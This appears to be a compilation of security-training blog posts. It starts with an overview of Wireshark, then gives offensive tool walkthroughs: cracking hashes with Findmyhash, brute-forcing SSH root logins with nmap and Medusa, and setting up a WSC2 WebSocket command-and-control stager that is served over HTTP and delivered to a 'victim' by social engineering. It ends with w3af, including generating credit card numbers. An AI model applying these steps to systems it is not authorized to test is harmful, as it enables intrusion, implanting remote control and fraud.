What is Wireshark?

  What is Wireshark?

Wireshark is the most common network protocol analyzer. In addition to being a free and an open source packet following the terms of the GNU General Public License(GPL), we mainly use it when it comes to network troubleshooting, analysis, software and communications protocol development, and education. It shows its user what is happening on their network at a microscopic level. A majority of commercial and non-profit organizations, government agencies, and educational institutions use Wireshark.

History:

In 1998 Gerald Combs, a computer science graduate of the University of Missouri-Kansas City, started a project and named it Ethereal. It was the basic foundation of Wireshark. having this name since 2006 when Combs started to work with CACE Technologies while holding the copyright of most of the project’s code. The rest of the code was opened for any modification under the GPL Terms. Then, volunteer contributions of network experts around the universe added to the project, making it as famous and widely used as it is nowadays.

Because Combs did not own the Ethereal trademark he decided to change its name into Wireshark. It was not until 2010 when Riverbed Technology purchased CACE Technologies to become the main sponsor of Wireshark. There are several contributors –around 600 authors– to this product; still, Combs is the essential responsible for maintaining the overall code and executing new version releases of Wireshark.

Wireshark won several awards for its vital role in today’s network security. It got an award for the Most Important Open-Source App of All-Time by eWeek. Moreover, it won the Editor’s Choice award from PC Magazine. In addition, Insecure.Org network security tools survey ranked as a top packet sniffer.

The functionality of Wireshark:

Similar to tcpdump, a common packet analyzer, Wireshark allows us to analyze network packets but with the aid of a graphical front-end and some extra integrated sorting and filtering options. A Network Interface Controller(NIC) is put into this mode if it does support promiscuous mode. This is usually in order to visualize all the traffic on the interface not merely the interface’s configured addresses and broadcast/multitask traffic.

However, to get the entire network traffic, other techniques such as port mirroring and network taps are utilized. This is done along with using the promiscuous mode on a port. This is attributed to the fact that a port does not necessarily get all the network traffic.

Wireshark 1.4 and later has the ability to put wireless network interface controllers into monitor mode. If some packets are captured by a remote machine and sent to Wireshark, protocols of type TZSP or OmniPeek’s protocol – where OmniPeek is another packet analyzer- are analyzed at the time they were captured on their remote machines.

What features does Wireshark include?

In fact, Wireshark offers a large set of features. In the following points, I will attempt to summarize the features that

Wireshark offers:

  • Wireshark is a network analyzer that inspects Hundreds of protocols.
  • It allows both offline analysis and live captures.
  • It could run on diverse operating systems such as Microsoft Windows, Linux, macOS, Sun Solaris, and several other platforms.
  • A graphical user interface (GUI) is supported using QT widget toolkit, which enables us to browse captured network data, or in the non-GUI version, TTY-mode TShark utility could be utilized for the same purpose as well.
  • It offers sufficient Voice over Internet Protocol(VoIP) analysis. We can even play the media flow when decoding such captured traffic.
  • Wireshark uses pcap to capture packets.
  • It generates Capture files in gzip format, which is easily decompressed.
  • Such captured files could be programmatically edited or altered to the “editcap” programming with the help of some command-line switches.
  • It allows the traffic capturing of Raw Universal Serial Bus(USB).
  • Wireshark is able to capture packets from ns OPNET Modeler, NetSim, and some other network simulation tools.
  • It supports Read/Write of many capture file formats such as tcpdump (libpcap) which is the native network trace file format, Pcap NG, Catapult DCT2000, Cisco Secure IDS iplog, Microsoft Network Monitor, Network General Sniffer, Sniffer Pro, NetXray, Network Instruments Observer, NetScreen snoop, Novell LANalyzer, RADCOM WAN/LAN Analyzer, Shomiti/Finisar Surveyor, Tektronix k12xx, Visual Networks Visual UpTime, WildPacketsEtherPeek/TokenPeek/AiroPeek and several other formats.
  • It reads Live Data through different means such as Ethernet IEEE 802.11, PPP/HDLC, ATM, loopback, Bluetooth, FDDI, and many others.
  • The decryption is supported for many protocols including IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP, and WPA/WPA2.
  • Application of Coloring rules to the packet list allows for quick and easy analysis. See section Color Coding for further details.
  • One can ensure that only the triggered traffic becomes analyzed by applying particular filters, timers, and other settings.
  • XML, PostScript, CSV or plain text are all the types that output is exported and formatted.

Security Policies:

In general, there is no need for certain security privileges to allow us to utilize neither Wireshark or TShark. Nowadays, only requires to have tcpdump or dumpcap, given special privileges, and run on a machine to capture traffic with no need for any further privileges for the user.

But how can a superuser grant the aforementioned required privileges to a user? The answer basically lies in the fact that tcpdump or dumpcap which come with Wireshark should have special privileges for them to capture packets into a file. This file would require the opening of Wireshark for analysis with seriously restricted privileges. Even wireless networks could harness Aircrack wireless security tools and capture IEEE 802.11 frames to further read the resulting tcpdump dumpcap files with running Wireshark afterward.

Why do we need to restrict the users from privileges to freely run Wireshark and use its tools? This is basically because capturing traffic calls an enormous number of protocol dissectors, which could most probably arise a network security risk. Since there is a potential of finding a bug in one of these dissectors and thereby exploiting it, this puts the entire security system at a great risk. That is why running Ethereal/Wireshark in the past required superuser privileges for one to be responsible for what can potentially be affected.

Filtering Packets:

Sometimes we need to capture specific traffic packets such as traffic which a program sends when phoning home. While a large number of captured packets in a network, one has to close down all other applications using the network in order to get some specific traffic type. At this point emerges the importance of Wireshark’s filters. At the top of the window, there is a filter box at which we can simply type a certain filter name in order to apply this filter and then we should click Apply, or press Enter alternatively. For instance, to see only DNS packets, we type “DNS” in the filter box. Wireshark helps auto-complete a filter name while writing its name in the filter box.

Color Coding:

The colors Green, Blue, and Black distinguish the type of captured packets. Conventionally, green color indicates Transmission Control Protocol (TCP) traffic. Dark blue, on the other hand, is Name System (DNS) traffic, whereas light blue demonstrates User Datagram Protocol (UDP) traffic. Black shows TCP packets with problems such as being out-of-order.

Try Certified Ethical Hacker for FREE!!!https://infosecaddicts.com/course/certified-ethical-hacker-v10/

References:

https://en.wikipedia.org/wiki/Wireshark

https://www.howtogeek.com/104278/how-to-use-wireshark-to-capture-filter-and-inspect-packets/amp/

https://www.wireshark.org/

https://wiki.wireshark.org/

http://sectools.org/

https://www.quora.com/unanswered/What-security-policies-can-you-check-using-Wireshark

Elsewhere, check out my other post about Metaspoilt.

Findmyhash password cracking

Findmyhash helps you to decipher some common hashes, and speedily, besides that, it is elementary to use you should only have installed python in your machine.

If you are passionate about deciphering passwords, this is a tool you should know. The first thing we must do is download the tools from the following link; this example is done from a Linux.

https://code.google.com/archive/p/findmyhash/downloads

I recommend Linux lite, is very light and stable, besides that is from the family of Debian, its interface is very helpful.

After downloading the file you just have to open a terminal in the folder where the file.py is located.

python findmyhash_v1.1.2.py MD5 -h "098f6bcd4621d373cade4e832627b4f6"

this will not take long and the result is as follows

python findmyhash_v1.1.2.py MD5 -h "25d55ad283aa400af464c76d713c07ad"

The result of the previous command line is as follows.

In the previous example utilizamod MD5 as shown in the images but acontinucacion you have a list of all the algorithms with which you can make tests.

Accepted algorithms are

MD4 – RFC 1320
MD5 – RFC 1321
SHA1 – RFC 3174 (FIPS 180-3)
SHA224 – RFC 3874 (FIPS 180-3)
SHA256 – FIPS 180-3
SHA384 – FIPS 180-3
SHA512 – FIPS 180-3
RMD160 – RFC 2857
GOST – RFC 5831
WHIRLPOOL – ISO/IEC 10118-3:2004
LM – Microsoft Windows hash
NTLM – Microsoft Windows hash
MYSQL – MySQL 3, 4, 5 hash
CISCO7 – Cisco IOS type 7 encrypted passwords
JUNIPER – Juniper Networks $9$ encrypted passwords
LDAP_MD5 – MD5 Base64 encoded
LDAP_SHA1 – SHA1 Base64 encoded

This is another example.

result

I invite you to try this tool with other hashes and analyze the results, maybe it can be useful if you need a very fast result.

If you are interested in learning more, we invite you to review this course.

Medusa

A brute force attack is the way to recover a key by trying all possible combinations until you find the one that allows access.

What is Medusa?

Medusa is one of the great tools for brute force. Based on word dictionaries, it is very stable, simple fast and allows attacks on many services.

Sintaxis

Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

How is it used?

Before cracking, we should establish whether the system is running an SSH service. Most probably SSH will be running on Port 22. This is the port that we will be using with Nmap. In a terminal, type:

nmap -sV -p 22 172.31.2.117

The -sV is a service scan while -p is to scan specific ports in our case, port 22. Other scans  in nmap include the FIN scan and the SYN scan:

sudo -H nmap -sF -p 22 172.31.2.117

sudo -H nmap -sS -p 22 172.31.2.117

When you need to scan all the systems on the network, include /24 at the end of the IP. It should look like this:

nmap -sV -p 22 172.31.2.0/24
On determining that an SSH service is running on port 22, we can proceed to crack.

#Medusa
Medusa is an awesome online cracking tool especially cracking SSH, Telnet, and FTP services. In case you’ve not installed Medusa type in a terminal:

sudo -H apt-get install medusa

On installing, type:

medusa --help
your screen should be similar to my screenshot:

medusa -h (host) -u (username) -P (wordlist) -M ssh

Medusa doesn’t include a brute-force method that tries out every probable password combination. Instead, it makes use of a wordlist. SecLists49 is a good set of wordlists that I’ve found on the internet. How fast medusa will try to crack the password depends on how big your wordlist is as well as the quality of your internet connection. In my opinion, the root account is what you’d want to try and crack. There are several modules, however, since we are cracking the SSH password the -M flag will be set to ssh.

If you are interested in learning more, we invite you to review this course.

WSC2

Introduction

WSC2 is a PoC of using the WebSockets and a browser process to serve as a C2 communication channel between an agent, running on the target system, and a controller acting as the actuel C2 server.

Installation

we clear the repository with the following command

$ git clone https://github.com/Arno0x/WSC2.git

we access the folder and list to see what it has

$ cd WSC2/
$ ls

we install the requirements remember that before you must create a virtaul environment with virtualenv

$ pip install -r requirements.txt

we modified the following file, you can do it with nano in this case we did it with vim. We edit the variable CALLBACK, we write our IP bone that of the attacking machine.

$ vim config.py

then we write the following command and press enter.

$ ./wsc2.py

We are going to create a batch file. But we can use many other types of stager options. This tool provides stager in jscript1, jscript2, jscript3. We are using jscript1 here because it is not required to compile. Rest of the stagers are required to compile. This command will create a wsc2Agent1.js in stagers directory.

$ genStager jscript1

We open a new terminal and enter the next location.

$ cd WSC2/

then we enter the next folder.

$ cd stagers/
$ python -m SimpleHTTPServer 80

This would be the way you would see entering from another machine, you can also use social engineering to get this file to your victim.

Resources:

github.com/Arno0x/WSC2

If you are interested in learning more, we invite you to review this course.

Python For InfoSec Professionals

Try Certified Ethical Hacker for FREE!!!

W3af

We always want to be doing safety tests, and we think we should create our own tools. There are many things created by other people that can facilitate our checks, one of them is w3af.

what is w3af?

w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to help you secure your web applications by finding and exploiting all web application vulnerabilities.

what can we do?

  1. Exploiting Web application vulnerabilities
  2. Scan REST APIs
  3. Web Application Payloads
  4. Metasploit integration

installation

git clone https://github.com/andresriancho/w3af.git

cd w3af/
./w3af_console
./tmp/w3af_dependency_install.sh

How is it used?

command to start the console

./w3af_console

The vast majority of which you can use by the terminal has this help command.

help

W3AF contains a series of utilities that support the process of discovery and exploitation of vulnerabilities, all these utilities are located in <W3AF_DIR> / tools.

gencc

Generate valid credit card numbers

cd tool
ls

./gencc -t mastercard

./gencc -t visa16

urldecode

Try decoding a given URL, often used to decode URLs in plain text ASCII format

./urldecode -d http%3A%2F%2Flocalhost%2Fw3af

Resources:

docs.w3af.org

If you are interested in learning more, we invite you to review this course.

Python For InfoSec Professionals